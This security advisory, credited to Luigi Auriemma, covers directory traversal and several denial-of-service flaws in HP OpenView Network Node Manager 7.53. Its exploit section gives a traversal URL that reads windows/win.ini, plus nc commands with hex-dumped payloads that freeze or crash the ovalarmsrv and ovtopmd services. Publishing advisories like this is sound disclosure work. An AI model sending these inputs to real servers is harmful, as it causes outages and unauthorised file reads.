|
|
|
|
| |
| OpenView NNM "automates the process of developing a hyper-accurate topology of your physical network, virtual network services and the complex relationships between them. It then uses that topology as the basis for intelligent root cause analysis to enhance network availability and performance." Multiple denial of service vulnerabilities as well as directory traversal vulnerability have been discovered in HP's OpenView NNM. |
| |
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/closedview_old-adv.txt
|
| |
Vulnerable Systems:
* HP OpenView Network Node Manager version 7.53
CGIs directory traversal
The CGIs available in NNM use some instructions which filters malicious chars in the parameters passed by the clients, for example to avoid directory traversal attacks, XSS and so on.
The path delimiter filtered by these CGIs is the backslash char, so using the slash will allow an attacker to download the files from the disk on which is installed NNM.
Denial of Service in ovalarmsrv
The ovalarmsrv service listening on port 2954 can be easily freezed with CPU at 100% and without the possibility of handling further requests on both its ports 2953 and 2954 simply sending an incomplete multi line request. In short the last numeric parameters of the requests 25, 45, 46, 47 and 81 is used to specify how much sub-arguments (one per line) will be sent. So ovalarmsrv starts a loop which terminates when all the sub arguments are received; closing the connection or not sending all or part of these arguments will freeze the entire service. The following are all the supported requests and their "sscanf" format:
REQUEST_CONTRIB_EVENTS (22): "%d %d %s"
REQUEST_PRINT (25): "%d %d %d %d %s"
REQUEST_DETAILS (33): "%d %d %s"
REQUEST_EVENT_DELETE (35): "%d %d %s"
REQUEST_EVENT_ACK (36): "%d %d %s"
REQUEST_RUN_ACTION (37): "%d %d %s %s"
REQUEST_SPECDATA (41):
REQUEST_EVENT_UNACK (44): "%d %d %s"
REQUEST_SAVE (45): "%d %d %d %d %s"
REQUEST_CAT_CHANGE (46): "%d %d %d %[^\n]"
REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]"
REQUEST_CONF_ACTIONS (48): "%d %d\n"
REQUEST_RESTORE_STATE (62): "%d %[^\n]"
REQUEST_SAVE_DIR (63):
REQUEST_LOCALE (66): "%d"
REQUEST_FORMAT_PRINT (81): "%d %d %d %d %s"
REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]"
NULL pointer in ovalarmsrv
The parameter which specifies the amount of sub-arguments described above is used to allocate a certain amount of initial dynamic memory (value * 2) for storing all the sub-arguments which is then reallocated wheen needed.
Specifying a too big unallocable amount of sub-arguments results in a NULL pointer which will crash the service.
Process termination in ovtopmd
The ovtopmd service listening on port 2532 uses a special type of packet (0x36) for forcing the termination of the process ("Exiting due to request of ovtopmd -k."), so an attacker can use this packet for causing a Denial of Service.
Exploits:
For the directory traversal:
http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini
For the denial of services:
nc SERVER 2954 -v -v -w 2 < closedviewx1.txt
nc SERVER 2954 -v -v < closedviewx2.txt
nc SERVER 2532 -v -v < closedviewx3.txt
closedviewx1.txt
0000000 3532 3020 3020 3120 2030 6f62 6d6f 000a
000000f
closedviewx2.txt
0000000 3532 3520 3020 3220 3431 3437 3338 3436
0000010 2037 6f62 6d6f 350a 2033 4141 4141 4141
0000020 4141 4141 4141 4141 4141 4141 4141 4141
0000030 4141 4141 4141 4141 4141 4141 4141 000a
000003f
closedviewx3.txt
0000000 0000 0400 0000 3600
0000008
|
|
|
|
|
|
|
|
|
|
